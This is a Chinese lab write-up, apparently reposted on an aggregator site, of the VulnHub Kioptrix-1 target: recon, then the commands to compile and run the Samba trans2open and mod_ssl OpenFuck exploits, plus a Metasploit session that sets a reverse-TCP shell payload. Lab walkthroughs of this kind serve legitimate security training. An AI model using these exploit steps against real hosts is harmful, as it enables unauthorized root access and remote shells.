当前位置: 首页 > news >正文

vulnhub靶场【kioptrix-1靶机】

前言

靶机:kioptrix-1,IP地址为192.168.1.104

攻击:kali,IP地址为192.168.1.16

都采用虚拟机,网卡为桥接模式

文章中涉及的靶机,来源于vulnhub官网,想要下载,可自行访问官网下载,或者通过下方链接下载https://pan.quark.cn/s/1f8bfb170c6d

主机发现

使用arp-scan -lnetdiscover -r 192.168.10.1/24扫描

也可以使用nmap等工具进行

信息收集

使用nmap扫描端口

对于后续的目录爆破等,因为我个人测试过,所以发现网站的目录无价值,进而直接搜索版本漏洞进行测试

smb漏洞寻找并利用

使用searchsploit

前面直接发现139端口开启,并且nmap扫描出的是sam服务

那么使用smbclient尝试连接,看能否有东西产出

如图,并未把版本揭示,那么我对于漏洞的使用缺失重要的一块

更换工具,采用github上的一个项目进行测试https://github.com/amitn322/smb-version/blob/master/samba_version.py

下载到kali中,然后执行脚本即可

python2 smbversion.py -s 192.168.1.104

使用searchsploit进行测试,发现对应的漏洞只有一个可用于继续下一步,对于.rb,因为是msf特有的,所以暂不考虑

查看10.c文件,给出了用法

那么直接进行编译即可

gcc 10.c -o exp

编译成功,直接执行上面的用法,针对单个ip即可

./exp -b 0 -v 192.168.1.104

执行后,提权至root

使用msf

把上面作为节点,这里是新的

这里还是要检测smb服务的版本,这里借助整个msf作为使用

使用下面命令启动msf,并搜索对应的模块

msfconsole
search type:auxiliary smb version detection

那么使用该模块,命令如下

msf6 > use 0
msf6 auxiliary(scanner/smb/smb_version) > optionsmsf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.104
msf6 auxiliary(scanner/smb/smb_version) > set rport 139
msf6 auxiliary(scanner/smb/smb_version) > optionsmsf6 auxiliary(scanner/smb/smb_version) > run

执行后,会看到对应的版本信息

通过版本在msf中搜索可执行漏洞,这里注意,漏洞都是同一种trans2open,只是操作系统不同,这里靶机为linux操作系统,所以根据操作系统去选择

search type:exploit samba 2.2

use 2
optionsset rhost 192.168.1.104
//端口默认目标的是139

这里需要设置一个payload进行监听反弹shell,所以需要设置linux的监听

set payload linux/x86/shell/reverse_tcp
//脚本很多,选择其中一个即可

这时候执行,等待缓冲区溢出的爆破,一会即可发现反弹成功

web应用漏洞寻找利用

在之前使用nmap扫描时,确定443端口服务的版本mod_ssl 2.8.4,尝试进行搜索了一下,发现有版本范围内的一个漏洞openfuck

searchsploit mod_ssl 2.8.4

再使用nikto测试,发现也是有提到,可能存在

nikto -h 192.168.1.104

测试,直接使用remote buffer overflow,这个是我个人习惯,采用最新版本。

查看这个c文件,其中有用法,以及条件

那么就执行安装后,然后再编译

apt-get install libssl-dev
gcc -o openfuck 47080.c -lcrypto

执行编译后的openfuck,查看帮助,提供用法

./openfuck

大概用法就是

./openfuck 192.168.1.104 [box] 443

向下翻找,发现与前面nmap扫描出的443端口的服务版本redhat,中间件版本apache 1.3.20对应的有两个

测试这两个即可

./openfuck 192.168.1.104 0x6a 443./openfuck 192.168.1.104 0x6b 443

这里经过测试两个,发现都是提示超时

可能这里无法利用,不过查看了网上的wp,发现可以利用,这让我陷入深思,所以暂且到这里,等我搞清楚,会发布

总结

该靶机考察以下几点:

  1. 对于存在的smb服务,要能够识别出版本信息,也就是信息收集,这样才能为下一步确定有无版本信息做铺垫
  2. 善于使用searchsploit,这个是调用一个漏洞库中的信息,当然对于漏洞库也不要仅限于一个,多个漏洞库去搜索,可能这个没有,那个会有
  3. 对于给出的pocc文件等,要会编译,并复现,经常查看源文件
  4. 对于msf这个强大的工具,要会使用,至少要知道一些简单的用法

主要考察的就是对于服务的版本历史漏洞的复现,以及利用

http://www.lryc.cn/news/524916.html

相关文章:

  • Linux 6.14 内核的主要特性
  • 【Linux】深刻理解动静态库
  • 亚博microros小车-原生ubuntu支持系列:8-脸部检测与人脸特效
  • 代码随想录算法训练营day32
  • 缓存之美:万文详解 Caffeine 实现原理(下)
  • 中企出海:从国际投资建厂:投前投中投后重点事项
  • github登录用的TOTP和恢复码都丢失了怎么办
  • 最长递增子序列问题(Longest Increasing Subsequence),动态规划法解决,贪心算法 + 二分查找优化
  • Python中采用.add_subplot绘制子图的方法简要举例介绍
  • 纯 Python、Django、FastAPI、Flask、Pyramid、Jupyter、dbt 解析和差异分析
  • C++实现有限元二维杆单元计算 Bar2D2Node类(纯自研 非套壳)
  • wx036基于springboot+vue+uniapp的校园快递平台小程序
  • Unity中两个UGUI物体的锚点和中心点设置成不一样的,然后怎么使两个物体的位置一样?
  • 兼职全职招聘系统架构与功能分析
  • HTML5 History API
  • 2025_1_22打卡
  • Formality:不可读(unread)的概念
  • stm32f103C8T6和AT24C256链接
  • 5.SQLAlchemy对两张有关联关系表查询
  • 2.2.1 语句结构
  • 安当二代TDE透明加密技术与SMS凭据管理系统相结合的数据库安全解决方案
  • es的date类型字段按照原生格式进行分组聚合
  • 高频次UDP 小包丢包分析
  • 科目四考试内容
  • 2015 年 4 月多省(区、市)公务员录用考试 《申论》真题详解
  • 四、CSS效果
  • 全面评测 DOCA 开发环境下的 DPU:性能表现、机器学习与金融高频交易下的计算能力分析
  • 图论 八字码
  • OSI5GWIFI自组网协议层次对比
  • 北理新源监控平台都管理哪些数据